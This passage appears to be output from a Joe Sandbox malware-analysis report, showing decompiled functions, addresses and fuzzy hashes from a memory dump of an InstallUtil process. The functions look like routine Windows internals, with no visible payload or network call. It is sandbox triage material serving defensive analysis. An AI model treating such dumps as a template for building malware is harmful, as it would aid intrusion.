0x0135c4b4
0x0135c4cd

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 83680dd5cad6d55fafd77d6f1de7c18347dea72b974fbb382b773fb3bc435be9
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 34019671140606BFE726AF69CC90E62FBBDFF5475CF004525F614525A0C722ACA1C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01394015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01394015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E012E2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E012E2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x13b86ac);
					E012CF900(0x13b86d4, _t28);
					E012DFFB0(0x13b86ac, _t28, 0x13b86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E012DFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0139401a
0x0139401e
0x01394023
0x01394028
0x01394029
0x0139402b
0x0139402f
0x01394043
0x01394046
0x01394051
0x01394057
0x0139405f
0x01394062
0x01394067
0x0139406f
0x0139407c
0x0139407c
0x0139408c
0x0139408c
0x01394097

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e05585023f259d9d185ed4a889202c920a052c07325deac2248f17fc6cc17f3
Instruction ID: b2edef5342c7ec54f32cb2751ee0dac0267e7b1aa1ce08beea929022f61f4817
Opcode Fuzzy Hash: 1e05585023f259d9d185ed4a889202c920a052c07325deac2248f17fc6cc17f3
Instruction Fuzzy Hash: 5601F272251946BFC715AB79CE84E63F7ECFF59664B000229F60887A11DB34EC12C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0138138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0138138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x13bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0130FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E012E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0130B640(E01309AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0138138a
0x0138138a
0x01381399
0x013813a3
0x013813a8
0x013813aa
0x013813b5
0x013813bb
0x013813c3
0x013813c6
0x013813c9
0x013813d4
0x013813e6
0x013813d6
0x013813df
0x013813df
0x013813f1
0x013813f2
0x013813f4
0x013813f9
0x0138140e

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c600bb9314d74ea712946650ee9dd3577479bcbddb1a89b0ffd7871195f72e
Instruction ID: 21a15b58ec9316deaad81fb380e53c95648e267226f0d7e435158d7b8fce8bf7
Opcode Fuzzy Hash: 38c600bb9314d74ea712946650ee9dd3577479bcbddb1a89b0ffd7871195f72e
Instruction Fuzzy Hash: 50019271A0030CAFDB10EFA8D841FAEBBF8EF44714F004066B904EB680D6709A41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013814FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E013814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x13bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0130FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E012E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0130B640(E01309AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x013814fb
0x013814fb
0x0138150a
0x01381514
0x01381519
0x0138151b
0x01381526
0x0138152c
0x01381534
0x01381537
0x0138153a
0x01381545
0x01381557
0x01381547
0x01381550
0x01381550
0x01381562
0x01381563
0x01381565
0x0138156a
0x0138157f

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736a3f387f139a6e86e67445ddd5a5be736e1edb5773144b2e9705210062e2d1
Instruction ID: 46ae133aafad3f39343ff2e5ace901889ef7775265c58ebce748f4125970c9a7
Opcode Fuzzy Hash: 736a3f387f139a6e86e67445ddd5a5be736e1edb5773144b2e9705210062e2d1
Instruction Fuzzy Hash: FF018C71A0124CAFDB10EFA8D845EAEBBB8EF44714F404066B904EB280DA70DA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 012C58EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E012C58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x13bd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x12a5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E012C5943() != 0 &&  *0x13b5320 > 5) {
					E01347B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01347B5E( &_v28, _t28);
					_t11 = E01347B9C(0x13b5320, 0x12abf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0130B640(_t11, _t17, _v8 ^ _t29, 0x12abf15, _t27, _t28);
			}

0x012c58fb
0x012c58fe
0x012c5906
0x012c590a
0x012c593c
0x012c593c
0x012c590c
0x012c590c
0x012c5911
0x00000000
0x012c5913
0x012c5913
0x012c5913
0x012c5911
0x012c591d
0x01321035
0x0132103c
0x0132103f
0x01321056
0x01321056
0x012c593b

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 740928b1ef708e69add7b417a1fb864c5a8f35ed550e233896df95e21e15a389
Instruction ID: 1e33279a4a6f05f92f11aa20b200c95db6b0302c82a25784a36a2940d06fe58b
Opcode Fuzzy Hash: 740928b1ef708e69add7b417a1fb864c5a8f35ed550e233896df95e21e15a389
Instruction Fuzzy Hash: 4001DF31B201099BC714EE28DC01AEE77ACEB51624F8402ADAB0997244EF30ED05C790

Uniqueness

Uniqueness Score: -1.00%

Function 012DB02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012DB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E012E7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01347016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x012db037
0x012db039
0x012db03b
0x012db040
0x0132a60e
0x00000000
0x00000000
0x0132a61d
0x012db04b
0x012db04e
0x0132a627
0x0132a634
0x00000000
0x00000000
0x0132a641
0x0132a653
0x0132a643
0x0132a64c
0x0132a64c
0x0132a65b
0x00000000
0x00000000
0x00000000
0x0132a66c
0x012db057
0x012db057
0x012db057
0x012db046
0x012db046
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: a73dbf0cb875d4c7fca7e731f774ee8b7253b532e8334ad503c79857733c615f
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 3B018F32221985DFE322971CC998F767BDCEB86B54F0A00A1FA19CBA51D769DC40C620

Uniqueness

Uniqueness Score: -1.00%

Function 01391074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01391074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0139165E(__ebx, 0x13b8ae4, (__edx -  *0x13b8b04 >> 0x14) + (__edx -  *0x13b8b04 >> 0x14), __edi, __ecx, (__edx -  *0x13b8b04 >> 0x14) + (__edx -  *0x13b8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0138AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E012E7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0137FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x01391074
0x01391080
0x01391082
0x0139108a
0x0139108f
0x01391093
0x013910ab
0x013910ab
0x013910c3
0x013910cf
0x013910e1
0x013910d1
0x013910da
0x013910da
0x013910e9
0x013910f5
0x013910f5
0x013910fe

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41bed007b40f887e21d0c07aa394d0f1d5bb4a42f0f6cb03b849de4e559a67d1
Instruction ID: 09d81a954df84b6cf98d8d20522c05de0fec8136db755c3f9411ab8a80058b75
Opcode Fuzzy Hash: 41bed007b40f887e21d0c07aa394d0f1d5bb4a42f0f6cb03b849de4e559a67d1
Instruction Fuzzy Hash: A9014C726047479FCB20EF2CC944B1A7BD9BF84328F048519F98593790EE31D444CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0137FE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0137FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x13bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0130FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E012E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0130B640(E01309AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0137fe3f
0x0137fe3f
0x0137fe4e
0x0137fe58
0x0137fe5d
0x0137fe5f
0x0137fe6a
0x0137fe72
0x0137fe75
0x0137fe78
0x0137fe83
0x0137fe95
0x0137fe85
0x0137fe8e
0x0137fe8e
0x0137fea0
0x0137fea1
0x0137fea3
0x0137fea8
0x0137febd

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7692f1cc8820ccd462c45bba104cb1ebf99b10e5efbde3488412264c2c9cc4e1
Instruction ID: 0e2c0b950266c6710e48313111e9cdcab9c6b21b9c3768ac8982d437e9c48b85
Opcode Fuzzy Hash: 7692f1cc8820ccd462c45bba104cb1ebf99b10e5efbde3488412264c2c9cc4e1
Instruction Fuzzy Hash: 4201D471E0020DAFDB24DFA8D845FAEBBFCEF40704F004066B904AB281DA749900C795

Uniqueness

Uniqueness Score: -1.00%

Function 0137FEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0137FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x13bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0130FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E012E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0130B640(E01309AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0137fec0
0x0137fec0
0x0137fecf
0x0137fed9
0x0137fede
0x0137fee0
0x0137feeb
0x0137fef3
0x0137fef6
0x0137fef9
0x0137ff04
0x0137ff16
0x0137ff06
0x0137ff0f
0x0137ff0f
0x0137ff21
0x0137ff22
0x0137ff24
0x0137ff29
0x0137ff3e

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8cb953970ab0c8b0abd0c986c28d9a6913c18edce753894ff39387850637871
Instruction ID: d2a922be3ac3a8f00b39da082bed76b326a6acd6dd988b2854a278b097571969
Opcode Fuzzy Hash: f8cb953970ab0c8b0abd0c986c28d9a6913c18edce753894ff39387850637871
Instruction Fuzzy Hash: 35018471E0120DAFDB14EBA9D845FAEBBBCEF44714F404066BA04AB281EA749A41C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 01398A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01398A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x13bd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E012E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0130B640(E01309AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x01398a62
0x01398a71
0x01398a79
0x01398a82
0x01398a85
0x01398a89
0x01398a8c
0x01398a8f
0x01398a92
0x01398a95
0x01398a9f
0x01398ab1
0x01398aa1
0x01398aaa
0x01398aaa
0x01398abc
0x01398abd
0x01398abf
0x01398ac4
0x01398ada

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf39845fef08bf31d707c7ccc1564650bfa5635b98181df9522f80c8cd2aab3a
Instruction ID: b7b82bff5becea5d3b93b9b5a400aec82f0222b6714dad9ed962c3bd8d8afb37
Opcode Fuzzy Hash: bf39845fef08bf31d707c7ccc1564650bfa5635b98181df9522f80c8cd2aab3a
Instruction Fuzzy Hash: 7D012C71A1121DAFDB00DFA9D941AAEBBF8EF59314F10405AFA04E7381E734A900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01398ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01398ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x13bd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E012E7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0130B640(E01309AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x01398ed6
0x01398ee5
0x01398eed
0x01398ef0
0x01398efa
0x01398f03
0x01398f0c
0x01398f15
0x01398f24
0x01398f27
0x01398f31
0x01398f43
0x01398f33
0x01398f3c
0x01398f3c
0x01398f4e
0x01398f4f
0x01398f51
0x01398f56
0x01398f69

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98059307ca46ef2f895c79a8212e2f32e2729b5d03461822d05652e01c21c1a7
Instruction ID: b879142c0ab62f1a56b33a2d7c223b6c2c3a7fd144a86db89b63cb38a316e8a2
Opcode Fuzzy Hash: 98059307ca46ef2f895c79a8212e2f32e2729b5d03461822d05652e01c21c1a7
Instruction Fuzzy Hash: 5E111E70E042099FDB04DFA8D445BAEFBF4FF08304F0442AAE519EB782E6349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012CDB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E012CDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E012CE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L012CE8B0(__ecx, _t14, 0xfff);
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x012cdb64
0x012cdb66
0x012cdb6b
0x012cdbaa
0x012cdb71
0x012cdb76
0x012cdb7a
0x012cdba3
0x012cdb7c
0x012cdb87
0x012cdb8b
0x01324fa1
0x01324fb3
0x01324fb8
0x012cdb91
0x012cdb96
0x012cdb98
0x012cdb98
0x012cdb8b
0x012cdb7a
0x012cdb9d
0x012cdba2

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 305c8e0c41c8dcd45664227bcf5d767fe6f03c052e00ddb5f8a1664adc55f304
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 0BF09C332715279BD7326AD9C8C4F77BAA59FD1E60F16023DF3099B344D9608C0296D5

Uniqueness

Uniqueness Score: -1.00%

Function 012CB1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E012E7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E012E7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01347016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x012cb1e8
0x012cb1ea
0x012cb1f3
0x01324a17
0x012cb1f9
0x012cb1f9
0x012cb1f9
0x012cb201
0x01324a21
0x01324a2e
0x00000000
0x00000000
0x01324a3b
0x01324a4d
0x01324a3d
0x01324a46
0x01324a46
0x01324a55
0x00000000
0x00000000
0x00000000
0x012cb20a
0x012cb20a
0x012cb20a
0x012cb20a

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 6ffefba5158da27e64f022c01fcb0d4427e3bf90aa824a20043fef7b0ef9b378
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 8101F432220684DBE322A75DD809F697FD9EF91B98F0800A5FB148B6B2D779C800C355

Uniqueness

Uniqueness Score: -1.00%

Function 0135FE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0135FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
